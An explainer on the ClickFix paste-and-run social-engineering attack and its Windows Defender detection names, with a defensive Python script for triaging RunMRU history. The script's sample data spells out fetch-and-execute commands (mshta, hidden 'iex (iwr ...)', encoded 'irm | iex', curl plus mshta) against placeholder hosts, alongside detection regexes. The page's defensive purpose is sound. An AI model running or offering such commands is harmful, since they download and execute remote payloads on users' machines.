Trojan:Win32/ClickFix
Trojan:Win32/ClickFix is the detection name for the ClickFix social engineering attack on Windows. Win32 here is Microsoft's platform label for Windows code and covers 64-bit systems as well; it does not mean the attack is limited to 32-bit installations. Threat actors use it to deceive users into copying malicious PowerShell code and pasting it into the Run dialog, a PowerShell console or Windows Terminal. The attack exploits the human tendency to resolve an apparently urgent or authoritative prompt quickly rather than stop and question it.
Behavior:Win32/ClickFix
Behavior:Win32/ClickFix is not classic malware but the detection name for a social engineering technique that tricks targets into voluntarily starting the infection chain themselves. The lure is a fake error message, a fake CAPTCHA or a bogus urgent security warning, usually shown as a pop-up after the target lands on a compromised, low-reputation or outright malicious website.
The technique pairs that lure with clipboard hijacking: script on the page places a malicious command on the victim's clipboard, and the prompt then instructs the user to open the Windows Run dialog (Win + R), paste (Ctrl + V) and press Enter. The pasted command relies on living-off-the-land binaries (LOLBins) such as mshta.exe, PowerShell or curl.exe to fetch and launch the final payload, so the browser never downloads a malicious file and browser download protections are not triggered.
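Because the command is typed into the Run dialog, Windows records it in the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which makes that key a natural place to hunt for ClickFix on a suspect host. The following Python is an added triage example written for this page, not code from the original article or from any vendor: it scores RunMRU-style values for the combination of a LOLBin with remote content, a hidden window, an encoded command, an in-memory download-and-execute idiom or the CAPTCHA decoy text, and decodes any -EncodedCommand payload so the inner script can be inspected. The sample entries, the hostnames and the signal names are constructed for the example; the same checks can be pointed at process-creation command lines (Sysmon event 1, Security 4688) with no change to the logic.

```python
"""Triage Run-dialog history (RunMRU) for ClickFix-style paste-and-run commands."""
import base64
import binascii
import re

# The Run dialog (Win+R) stores each executed line under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as values
# named a, b, c, ... each terminated by the literal marker "\1".
# Everything below is a constructed sample for this example, not data from a real host.


def _encoded(cmd: str) -> str:
    # powershell -EncodedCommand expects base64 of the UTF-16LE script text
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


SAMPLE_RUNMRU = {
    "a": r"notepad\1",
    "b": r"mshta https://verify-captcha.example/check.mp4\1",
    "c": r'powershell -w hidden -c "iex (iwr https://cdn.example/l.txt -UseBasicParsing)" # ✅ I am not a robot\1',
    "d": "powershell -nop -w hidden -enc " + _encoded("irm https://cdn.example/p.ps1 | iex") + r"\1",
    "e": r"cmd /c curl.exe -s https://x.example/a.hta -o %TEMP%\a.hta && mshta %TEMP%\a.hta\1",
    "f": r"services.msc\1",
}

# Heuristics taken from the technique: a LOLBin launched from the Run dialog together
# with remote content, a hidden window, an encoded script, an in-memory
# download-and-execute idiom, or the CAPTCHA decoy text appended to the command.
LOLBINS = re.compile(
    r"(?i)\b(mshta|powershell|pwsh|curl|certutil|bitsadmin|cmd|wscript|cscript|msiexec)(?:\.exe)?\b"
)
SIGNALS = {
    "remote_url": re.compile(r"(?i)https?://"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "download_exec": re.compile(
        r"(?i)\b(iex|invoke-expression|irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b"
    ),
    "captcha_decoy": re.compile(r"(?i)i am not a robot|captcha|✅"),
}
# -e / -ec / -enc / -encoded / -encodedcommand followed by a base64 blob
ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_run_entry(raw: str) -> dict:
    """Score one RunMRU value; returns the cleaned command, reasons and any decoded payload."""
    cmd = re.sub(r"\\1$", "", raw)  # strip the trailing "\1" RunMRU marker
    decoded = decode_encoded_command(cmd)
    # scan the decoded script too, so signals hidden inside -enc are not missed
    scan_text = cmd if decoded is None else cmd + "\n" + decoded
    reasons = []
    if LOLBINS.search(cmd):
        reasons.append("lolbin")
    if decoded is not None:
        reasons.append("encoded_command")
    for name, pattern in SIGNALS.items():
        if pattern.search(scan_text):
            reasons.append(name)
    # A bare LOLBin (someone typing "cmd") is normal; flag only a LOLBin
    # combined with at least one delivery or evasion signal.
    flagged = "lolbin" in reasons and len(reasons) > 1
    return {"command": cmd, "decoded": decoded, "reasons": reasons, "flagged": flagged}


def triage_runmru(entries: dict) -> dict:
    """Return {value_name: reasons} for every entry that looks like ClickFix paste-and-run."""
    hits = {}
    for name, raw in entries.items():
        result = analyze_run_entry(raw)
        if result["flagged"]:
            hits[name] = result["reasons"]
    return hits


if __name__ == "__main__":
    for name, reasons in triage_runmru(SAMPLE_RUNMRU).items():
        print(name, SAMPLE_RUNMRU[name], reasons)
```

On the constructed sample the plain `notepad` and `services.msc` entries pass, while the four LOLBin launches that carry a URL, a hidden window or an encoded payload are returned with the reasons that fired. Reading the values on a live host is a one-liner in PowerShell (`Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`); the decision logic is kept separate so it can be reused unchanged against exported registry data or command-line telemetry.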
VirTool:Script/AmsiSuspClickfix
VirTool:Script/AmsiSuspClickfix is the detection name raised when the Antimalware Scan Interface (AMSI) scans the script content of a ClickFix command at execution time and flags it as suspicious. The pasted PowerShell is usually obfuscated so that its text evades file-based antivirus signatures; AMSI is handed the script as the engine is about to run it, after layers of obfuscation have been unwrapped in memory, which is what allows this detection to fire on the real command. It typically appears after a user has followed a fake system-fix prompt and run the clipboard contents through the Run dialog, a PowerShell console or Windows Terminal.